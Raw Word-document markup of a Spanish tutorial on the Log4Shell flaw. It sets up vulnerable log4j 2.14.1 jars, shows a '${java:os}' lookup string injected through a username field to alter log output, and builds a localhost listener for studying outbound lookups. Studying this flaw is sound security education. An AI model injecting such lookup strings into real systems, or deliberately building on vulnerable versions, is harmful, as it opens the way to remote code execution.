          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF00FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1448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ECHO</w:t>
      </w:r>
      <w:r w:rsidRPr="00B144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OFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRPr="00B14487" w:rsidRDefault="009A5989" w:rsidP="009A59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A5989" w:rsidRDefault="009A5989" w:rsidP="009A59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REM CLASSPATH con las versiones vulnerables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRPr="00B14487" w:rsidRDefault="009A5989" w:rsidP="009A59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1448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B144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CLASSPATH</w:t>
      </w:r>
      <w:r w:rsidRPr="00B14487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=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1448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apache-log4j-2.14.1-bin\log4j-core-2.14.1.jar;apache-log4j-2.14.1-bin\log4j-api-2.14.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRPr="00B14487" w:rsidRDefault="009A5989" w:rsidP="009A59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A5989" w:rsidRDefault="009A5989" w:rsidP="009A59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REM Ejecuto el ejemplo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRDefault="009A5989" w:rsidP="009A598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java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-Dlog4j.configurationFile=Log4ShellEjemplo2.properties Log4ShellEjemplo1.java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRDefault="009A5989" w:rsidP="009A598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PAUSE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA2DB3" w:rsidRDefault="00AA2DB3" w:rsidP="00AA2DB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color w:val="000000"/>
        </w:rPr>
      </w:pP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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Vemos como no hemos tenido que modificar código para modificar esta funcionalidad, simplemente hemos realizado una configuración.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRDefault="009A598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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRPr="00560DC2" w:rsidRDefault="009A5989" w:rsidP="009A598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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">Bienvenido a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>aplicacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>, por favor indique su usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRPr="00560DC2" w:rsidRDefault="009A5989" w:rsidP="009A598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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Usuario: Desde las horas extras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRPr="00560DC2" w:rsidRDefault="009A5989" w:rsidP="009A598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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Su usuario es incorrecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRPr="00560DC2" w:rsidRDefault="009A5989" w:rsidP="009A598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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">Presione una tecla para </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>continuar .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00560DC2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> . .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A5989" w:rsidRDefault="009A5989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</w:p>
    <w:p w:rsidR="009A5989" w:rsidRDefault="009A5989" w:rsidP="009A598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33415" cy="715809"/>
            <wp:effectExtent l="1905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15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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Por comodidad, seguiremos trabajando con el ejemplo uno y revisaremos los resultados por pantalla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E12315">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:ind w:left="283"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uso de Lookups</w:t>
      </w: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 xml:space="preserve">Los </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="004702F1">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>Lookups</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una carterista de Log4J que permite sustituir ciertos valores en el mensaje indicado, por valores almacenados en memoria </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> obtenidos al vuel</w:t>
      </w:r>
      <w:r w:rsidR="004702F1">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o al momento de realizar el log.</w:t>
      </w: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>Por ejemplo si quisiera guardar el runtime de java podría usar el siguiente Lookup {java</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>:runtime</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>} o si quisiera la versión del sistema operativo pudiera usar esta {java:os}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRPr="004702F1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color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Veamos esto funcionando, en el lugar de nuestro usuario vamos a poner la siguiente cadena </w:t>
      </w:r>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>“Nuestro usuario es ${java</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>:os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>}”</w:t>
      </w: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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">En la salida </w:t>
      </w:r>
      <w:r>
        <w:t>del programa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> se ve la versión del sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004702F1" w:rsidRPr="004702F1" w:rsidRDefault="004702F1" w:rsidP="004702F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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">Bienvenido a la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>aplicacion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>, por favor indique su usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004702F1" w:rsidRPr="004702F1" w:rsidRDefault="004702F1" w:rsidP="004702F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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Usuario: Nuestro usuario es ${java</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>:os</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004702F1" w:rsidRPr="004702F1" w:rsidRDefault="004702F1" w:rsidP="004702F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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Su usuario es incorrecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004702F1" w:rsidRPr="004702F1" w:rsidRDefault="004702F1" w:rsidP="004702F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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>20:11:23.595 [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">] ERROR Log4ShellEjemplo1 - El usuario 'Nuestro usuario es Windows 10 10.0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>architecture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>: amd64-64' es incorrecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004702F1" w:rsidRPr="004702F1" w:rsidRDefault="004702F1" w:rsidP="004702F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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">Presione una tecla para </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>continuar .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004702F1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve"> . .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B03705" w:rsidRDefault="00B03705" w:rsidP="004702F1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</w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00E12315" w:rsidP="004702F1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color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Parece raro o poco conveniente, que un valor </w:t>
      </w:r>
      <w:r>
        <w:t>introducido</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> por un usuario </w:t>
      </w:r>
      <w:r>
        <w:t>modifique</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> lo que se va guardar en el lo</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, aunque se </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">podría </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">alegar que de todas </w:t>
      </w:r>
      <w:r>
        <w:t>formas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> dicho valor o </w:t>
      </w:r>
      <w:r>
        <w:t>modificación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> se guarda en los medios que dispone la </w:t>
      </w:r>
      <w:r>
        <w:t>aplicación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para tal </w:t>
      </w:r>
      <w:r>
        <w:t>efecto.</w:t>
      </w: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color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">ro los </w:t>
      </w:r>
      <w:r>
        <w:t>Lookups</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, son mucho </w:t>
      </w:r>
      <w:r>
        <w:t>más</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> avanzados, pueden por ejemplo obtener el valor de </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a escribir en el log  mediante </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>HTTP, LDAP o RMI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (entre otros)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> es decir mediante una </w:t>
      </w:r>
      <w:r>
        <w:t>conexión</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> externa a equipos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009903B2" w:rsidRDefault="00B0370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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Preparación para estudiar</w:t>
      </w:r>
      <w:r w:rsidR="00E12315">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00541BBB" w:rsidRDefault="00541BBB" w:rsidP="00541BB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</w:pPr>
      <w:r w:rsidRPr="00541BBB">
        <w:t xml:space="preserve">Para entender de manera segura la vulnerabilidad, se creó un simple programa servidor en java, que lo único que hace es esperar una conexiones y mostrar lo que se envié por pantalla. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRP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41BB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1BB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1BB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41BBB" w:rsidRP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//Reviso el puerto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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"Debe especificar el puerto."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41BBB" w:rsidRPr="00DC100E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DC100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DC100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41BBB" w:rsidRP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41BBB" w:rsidRP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41BB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port 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parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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41BB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541BBB" w:rsidRP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41BBB" w:rsidRP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41BB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541BB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Abro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541BB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el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541BB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sockect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541BB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de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541BB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escucha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRP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41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  <w:proofErr w:type="gramEnd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ServerSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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serverSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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1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ServerSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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port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41BBB" w:rsidRP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//Quedo en espera</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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"Escuchando en el puerto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41BBB" w:rsidRP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Socket </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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serverSocket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accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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41BBB" w:rsidRP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println</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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41BB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541BB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Cliente</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541BB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r w:rsidRPr="00541BB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conectado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541BB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\n"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41BBB" w:rsidRP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41BBB" w:rsidRP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541BB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541BB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Creo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541BB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el buffer de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00541BBB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lectura</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRP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InputStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 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socket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getInputStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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41BBB" w:rsidRP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41BB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buffSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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socket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getReceiveBufferSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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541BBB" w:rsidRP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41BB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bytes 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1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1BB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byte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buffSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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541BBB" w:rsidRP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//Leo los datos y cierro la conexiones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRP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541BBB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gramEnd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 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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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bytes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41BBB" w:rsidRP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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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bytes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1BB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41BBB" w:rsidRP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socket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close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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41BBB" w:rsidRP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println</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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41BBB" w:rsidRP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541BBB" w:rsidRP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541BBB" w:rsidRP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541BBB" w:rsidRP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1BB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IOException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ex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41BBB" w:rsidRP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proofErr w:type="gramStart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println</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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41BB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"Server exception: "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</w:t>
      </w:r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getMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00541BB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41BB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printStackTrace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541BBB" w:rsidRDefault="00541BBB" w:rsidP="00541BB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OFF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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REM Ejecuto el ejemplo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>java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SimpleJavaServer.java 8888</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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PAUSE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRDefault="00541BBB" w:rsidP="00541BB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903B2" w:rsidRDefault="00E12315" w:rsidP="00541BB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b/>
          <w:color w:val="000000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Si hacemos una petición en nuestro navegador a http://127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidR="00541BBB">
        <w:t>:8888</w:t>
      </w:r>
      <w:r>
        <w:t>/ejemplo obtendremos el siguiente resultado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00541BBB" w:rsidRDefault="00541BBB" w:rsidP="00541BB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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Escuchando en el puerto 8888.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00541BBB" w:rsidRDefault="00541BBB" w:rsidP="00541BB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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00541BBB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>Cliente conectado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ejemplo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Host: 127.0.0.1:8888</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00DC100E" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC100E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cache-Control: max-age=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00541BBB" w:rsidRPr="00B14487" w:rsidRDefault="00541BBB" w:rsidP="00541BB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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sec-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ua</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14487">
        <w:rPr>
